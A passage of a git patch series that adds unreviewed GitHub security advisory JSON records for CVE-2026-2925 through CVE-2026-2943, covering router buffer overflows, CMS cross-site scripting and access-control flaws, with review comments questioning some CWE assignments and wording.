+ "url": "https://github.com/libvips/libvips/issues/4857#issuecomment-3878479322" + }, + { + "type": "WEB", + "url": "https://github.com/libvips/libvips/commit/a56feecbe9ed66521d9647ec9fbcd2546eccd7ee" + }, + { + "type": "WEB", + "url": "https://github.com/libvips/libvips" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347222" + }, + { + "type": "WEB", + "url": 
"https://vuldb.com/?id.347222" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755224" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T04:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v4fw-f854-rf72/GHSA-v4fw-f854-rf72.json b/advisories/unreviewed/2026/02/GHSA-v4fw-f854-rf72/GHSA-v4fw-f854-rf72.json new file mode 100644 index 0000000000000..4586864ee1ae4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v4fw-f854-rf72/GHSA-v4fw-f854-rf72.json 
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v4fw-f854-rf72", + "modified": "2026-02-22T06:30:17Z", + "published": "2026-02-22T06:30:17Z", + "aliases": [ + "CVE-2026-2925" + ], + "details": "A vulnerability was detected in D-Link DWR-M960 1.01.07. Affected by this issue is the function sub_42B5A0 of the file /boafrm/formBridgeVlan of the component Bridge VLAN Configuration Endpoint. Performing a manipulation of the argument submit-url results in stack-based buffer overflow. The attack can be initiated remotely. The exploit is now public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2925" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/20" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347272" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347272" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754497" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T04:16:00Z" + } +} \ No newline at end of file From 55528546676022d2a99d27364fa0d6a25a39eb87 Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 22 Feb 2026 09:32:04 +0000 Subject: [PATCH 43/77] Publish Advisories GHSA-3jg4-mfj9-3m8j GHSA-786c-jm2j-j6xw GHSA-7mmp-vchm-mm2p GHSA-9cqv-87fq-8fjx GHSA-c5fm-9xmx-m8v3 GHSA-f5hx-m48w-jh25 GHSA-rm9x-gmj8-vfxh --- .../GHSA-3jg4-mfj9-3m8j.json | 52 ++++++++++++++++ .../GHSA-786c-jm2j-j6xw.json | 52 ++++++++++++++++ .../GHSA-7mmp-vchm-mm2p.json | 40 +++++++++++++ .../GHSA-9cqv-87fq-8fjx.json | 52 ++++++++++++++++ .../GHSA-c5fm-9xmx-m8v3.json | 56 +++++++++++++++++ .../GHSA-f5hx-m48w-jh25.json | 56 +++++++++++++++++ .../GHSA-rm9x-gmj8-vfxh.json | 60 +++++++++++++++++++ 7 files changed, 368 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-3jg4-mfj9-3m8j/GHSA-3jg4-mfj9-3m8j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-786c-jm2j-j6xw/GHSA-786c-jm2j-j6xw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7mmp-vchm-mm2p/GHSA-7mmp-vchm-mm2p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9cqv-87fq-8fjx/GHSA-9cqv-87fq-8fjx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c5fm-9xmx-m8v3/GHSA-c5fm-9xmx-m8v3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f5hx-m48w-jh25/GHSA-f5hx-m48w-jh25.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rm9x-gmj8-vfxh/GHSA-rm9x-gmj8-vfxh.json diff --git a/advisories/unreviewed/2026/02/GHSA-3jg4-mfj9-3m8j/GHSA-3jg4-mfj9-3m8j.json b/advisories/unreviewed/2026/02/GHSA-3jg4-mfj9-3m8j/GHSA-3jg4-mfj9-3m8j.json new file mode 100644 index 0000000000000..9aa8fe01a30ef --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3jg4-mfj9-3m8j/GHSA-3jg4-mfj9-3m8j.json 
@@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3jg4-mfj9-3m8j", + "modified": "2026-02-22T09:30:26Z", + "published": "2026-02-22T09:30:26Z", + "aliases": [ + "CVE-2026-2933" + ], + "details": "A weakness has been identified in YiFang CMS up to 2.0.5. This affects the function update of the file app/db/admin/D_adManage.php of the component Extended Management Module. Executing a manipulation of the argument Name can lead to cross site scripting. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2933" + }, + { + "type": "WEB", + "url": "https://github.com/ZZCTD/CVE/issues/4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347279" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347279" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755295" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T08:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-786c-jm2j-j6xw/GHSA-786c-jm2j-j6xw.json b/advisories/unreviewed/2026/02/GHSA-786c-jm2j-j6xw/GHSA-786c-jm2j-j6xw.json new file mode 100644 index 0000000000000..6f90c27cc67e1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-786c-jm2j-j6xw/GHSA-786c-jm2j-j6xw.json 
@@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-786c-jm2j-j6xw", + "modified": "2026-02-22T09:30:26Z", + "published": "2026-02-22T09:30:26Z", + "aliases": [ + "CVE-2026-2934" + ], + "details": "A security vulnerability has been detected in YiFang CMS up to 2.0.5. This impacts the function update of the file app/db/admin/D_friendLinkGroup.php of the component Extended Management Module. The manipulation of the argument Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2934" + }, + { + "type": "WEB", + "url": "https://github.com/ZZCTD/CVE/issues/5" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347280" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347280" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755296" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T09:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7mmp-vchm-mm2p/GHSA-7mmp-vchm-mm2p.json b/advisories/unreviewed/2026/02/GHSA-7mmp-vchm-mm2p/GHSA-7mmp-vchm-mm2p.json new file mode 100644 index 0000000000000..3ba0a30a3063e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7mmp-vchm-mm2p/GHSA-7mmp-vchm-mm2p.json 
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7mmp-vchm-mm2p", + "modified": "2026-02-22T09:30:26Z", + "published": "2026-02-22T09:30:26Z", + "aliases": [ + "CVE-2026-2385" + ], + "details": "The The Plus Addons for Elementor – Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Insufficient Verification of Data Authenticity in all versions up to, and including, 6.4.7. This is due to the plugin decrypting and trusting attacker-controlled email_data in an unauthenticated AJAX handler without cryptographic authenticity guarantees. This makes it possible for unauthenticated attackers to tamper with form email routing and redirection values to trigger unauthorized email relay and attacker-controlled redirection via the 'email_data' parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2385" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3463156/the-plus-addons-for-elementor-page-builder" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9176535c-8e37-4a18-b458-a71c4a84daa4?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-345" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T09:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9cqv-87fq-8fjx/GHSA-9cqv-87fq-8fjx.json b/advisories/unreviewed/2026/02/GHSA-9cqv-87fq-8fjx/GHSA-9cqv-87fq-8fjx.json new file mode 100644 index 0000000000000..8d5fe8e089164 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9cqv-87fq-8fjx/GHSA-9cqv-87fq-8fjx.json 
@@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9cqv-87fq-8fjx", + "modified": "2026-02-22T09:30:26Z", + "published": "2026-02-22T09:30:26Z", + "aliases": [ + "CVE-2026-2935" + ], + "details": "A weakness has been identified in UTT HiPER 810G up to 1.7.7-171114. This issue affects the function strcpy of the file /goform/ConfigExceptMSN. Executing a manipulation of the argument remark can lead to buffer overflow. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2935" + }, + { + "type": "WEB", + "url": "https://github.com/alc9700jmo/CVE/issues/23" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347297" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347297" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755297" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T09:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-c5fm-9xmx-m8v3/GHSA-c5fm-9xmx-m8v3.json b/advisories/unreviewed/2026/02/GHSA-c5fm-9xmx-m8v3/GHSA-c5fm-9xmx-m8v3.json new file mode 100644 index 0000000000000..b9f53c43c56df --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c5fm-9xmx-m8v3/GHSA-c5fm-9xmx-m8v3.json 
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c5fm-9xmx-m8v3", + "modified": "2026-02-22T09:30:26Z", + "published": "2026-02-22T09:30:26Z", + "aliases": [ + "CVE-2026-2930" + ], + "details": "A vulnerability was identified in Tenda A18 15.13.07.13. The affected element is the function webCgiGetUploadFile of the file /cgi-bin/UploadCfg of the component Httpd Service. Such manipulation of the argument boundary leads to stack-based buffer overflow. The attack can be executed remotely. The exploit is publicly available and might be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2930" + }, + { + "type": "WEB", + "url": "https://github.com/master-abc/cve/issues/40" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347277" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347277" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755227" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T07:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f5hx-m48w-jh25/GHSA-f5hx-m48w-jh25.json b/advisories/unreviewed/2026/02/GHSA-f5hx-m48w-jh25/GHSA-f5hx-m48w-jh25.json new file mode 100644 index 0000000000000..d6aa584d98987 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f5hx-m48w-jh25/GHSA-f5hx-m48w-jh25.json 
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-f5hx-m48w-jh25",
+ "modified": "2026-02-22T09:30:26Z",
+ "published": "2026-02-22T09:30:26Z",
+ "aliases": [
+ "CVE-2026-2938"
+ ],
+ "details": "A vulnerability has been found in SourceCodester Student Result Management System 1.0. The affected element is an unknown function of the file /srms/script/admin/core/update_smtp.php. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2938"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Shaon-Xis/SRMS-1.0---Unauthenticated-SMTP-Hijacking-to-Account-Takeover"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347310"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347310"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.755345"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.sourcecodester.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-266"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T09:16:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-rm9x-gmj8-vfxh/GHSA-rm9x-gmj8-vfxh.json b/advisories/unreviewed/2026/02/GHSA-rm9x-gmj8-vfxh/GHSA-rm9x-gmj8-vfxh.json
new file mode 100644
index 0000000000000..e70e23ced3756
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-rm9x-gmj8-vfxh/GHSA-rm9x-gmj8-vfxh.json
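Review bot: The `cwe_ids` entry `"CWE-266"` (Incorrect Privilege Assignment) does not match what the record describes: `details` reports improper access controls on `/srms/script/admin/core/update_smtp.php`, and both `severity` vectors use `PR:N`, meaning no privileges are needed to reach it. `"CWE-284"` fits the wording, or `"CWE-306"` if the root cause turns out to be a missing authentication check. The title of the first WEB reference mentions account takeover, so the `C:L/I:L/A:L` impacts and the `MODERATE` label may understate the risk and should not be the only input to triage.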
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rm9x-gmj8-vfxh",
+ "modified": "2026-02-22T09:30:26Z",
+ "published": "2026-02-22T09:30:26Z",
+ "aliases": [
+ "CVE-2026-2932"
+ ],
+ "details": "A security flaw has been discovered in YiFang CMS up to 2.0.5. The impacted element is the function update of the file app/db/admin/D_adPosition.php of the component Extended Management Module. Performing a manipulation of the argument name/index results in cross site scripting. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2932"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ZZCTD/CVE/issues/2"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ZZCTD/CVE/issues/3"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347278"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347278"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.755281"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.755286"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T08:15:55Z"
+ }
+}
\ No newline at end of file
From 2ab36c6826f802e30ac315a3a2d42dfd17b762a0 Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 22 Feb 2026 12:32:04 +0000 Subject: [PATCH 44/77] Publish Advisories GHSA-7p2j-mg94-f4j6 GHSA-cv79-qfjv-wpvr GHSA-qqmj-6rm4-v4q6 GHSA-wh45-rv58-w5rc --- .../GHSA-7p2j-mg94-f4j6.json | 60 +++++++++++++++++++ .../GHSA-cv79-qfjv-wpvr.json | 60 +++++++++++++++++++ .../GHSA-qqmj-6rm4-v4q6.json | 52 ++++++++++++++++ .../GHSA-wh45-rv58-w5rc.json | 52 ++++++++++++++++ 4 files changed, 224 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-7p2j-mg94-f4j6/GHSA-7p2j-mg94-f4j6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cv79-qfjv-wpvr/GHSA-cv79-qfjv-wpvr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qqmj-6rm4-v4q6/GHSA-qqmj-6rm4-v4q6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wh45-rv58-w5rc/GHSA-wh45-rv58-w5rc.json diff --git a/advisories/unreviewed/2026/02/GHSA-7p2j-mg94-f4j6/GHSA-7p2j-mg94-f4j6.json b/advisories/unreviewed/2026/02/GHSA-7p2j-mg94-f4j6/GHSA-7p2j-mg94-f4j6.json new file mode 100644 index 0000000000000..eb2fe759a4315 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7p2j-mg94-f4j6/GHSA-7p2j-mg94-f4j6.json 
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-7p2j-mg94-f4j6",
+ "modified": "2026-02-22T12:30:26Z",
+ "published": "2026-02-22T12:30:26Z",
+ "aliases": [
+ "CVE-2026-2939"
+ ],
+ "details": "A vulnerability was found in itsourcecode Student Management System 1.0. The impacted element is an unknown function of the file /add_student/ of the component Add Student Module. The manipulation results in cross site scripting. It is possible to launch the attack remotely. The exploit has been made public and could be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2939"
+ },
+ {
+ "type": "WEB",
+ "url": "https://drive.google.com/file/d/1a-qY55pgynQviBw9UxPoIDs-UNgz6zOH/view"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/AS-AbdulSamad/CVE-1/tree/main"
+ },
+ {
+ "type": "WEB",
+ "url": "https://itsourcecode.com"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347311"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347311"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.755977"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T10:15:56Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-cv79-qfjv-wpvr/GHSA-cv79-qfjv-wpvr.json b/advisories/unreviewed/2026/02/GHSA-cv79-qfjv-wpvr/GHSA-cv79-qfjv-wpvr.json
new file mode 100644
index 0000000000000..30fe44e6dc033
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-cv79-qfjv-wpvr/GHSA-cv79-qfjv-wpvr.json
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cv79-qfjv-wpvr",
+ "modified": "2026-02-22T12:30:26Z",
+ "published": "2026-02-22T12:30:26Z",
+ "aliases": [
+ "CVE-2026-2940"
+ ],
+ "details": "A vulnerability was determined in Zaher1307 tiny_web_server up to 8d77b1044a0ca3a5297d8726ac8aa2cf944d481b. This affects the function tiny_web_server/tiny.c of the file tiny_web_server/tiny.c of the component URL Handler. This manipulation causes out-of-bounds write. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2940"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Zaher1307/tiny_web_server/issues/1"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Zaher1307/tiny_web_server/issues/1#issue-3924357507"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Zaher1307/tiny_web_server"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347312"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347312"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.756036"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T10:15:56Z"
+ }
+}
\ No newline at end of file
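Review bot: `details` never identifies the vulnerable function: it reads "the function tiny_web_server/tiny.c of the file tiny_web_server/tiny.c", so the file path has been substituted for the function name. The same string has "Continious" for "Continuous". The text describes an out-of-bounds write, for which `"CWE-787"` is more precise than the generic `"CWE-119"` under `cwe_ids`. The second and third `references` entries point at the same issue (`issues/1` with and without a fragment), so one of them adds nothing.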
diff --git a/advisories/unreviewed/2026/02/GHSA-qqmj-6rm4-v4q6/GHSA-qqmj-6rm4-v4q6.json b/advisories/unreviewed/2026/02/GHSA-qqmj-6rm4-v4q6/GHSA-qqmj-6rm4-v4q6.json
new file mode 100644
index 0000000000000..c6ce3d3ac6f82
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-qqmj-6rm4-v4q6/GHSA-qqmj-6rm4-v4q6.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qqmj-6rm4-v4q6",
+ "modified": "2026-02-22T12:30:26Z",
+ "published": "2026-02-22T12:30:26Z",
+ "aliases": [
+ "CVE-2026-2943"
+ ],
+ "details": "A vulnerability was identified in SapneshNaik Student Management System up to f4b4f0928f0b5551a28ee81ae7e7fe47d9345318. This impacts an unknown function of the file index.php. Such manipulation of the argument Error leads to cross site scripting. The attack can be launched remotely. The exploit is publicly available and might be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2943"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/duckpigdog/CVE/blob/main/XSS%E2%80%94%E2%80%94SapneshNaik_Student-Management-System.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347313"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347313"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754035"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T11:16:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-wh45-rv58-w5rc/GHSA-wh45-rv58-w5rc.json b/advisories/unreviewed/2026/02/GHSA-wh45-rv58-w5rc/GHSA-wh45-rv58-w5rc.json
new file mode 100644
index 0000000000000..fdd3d10cd0fee
--- /dev/null
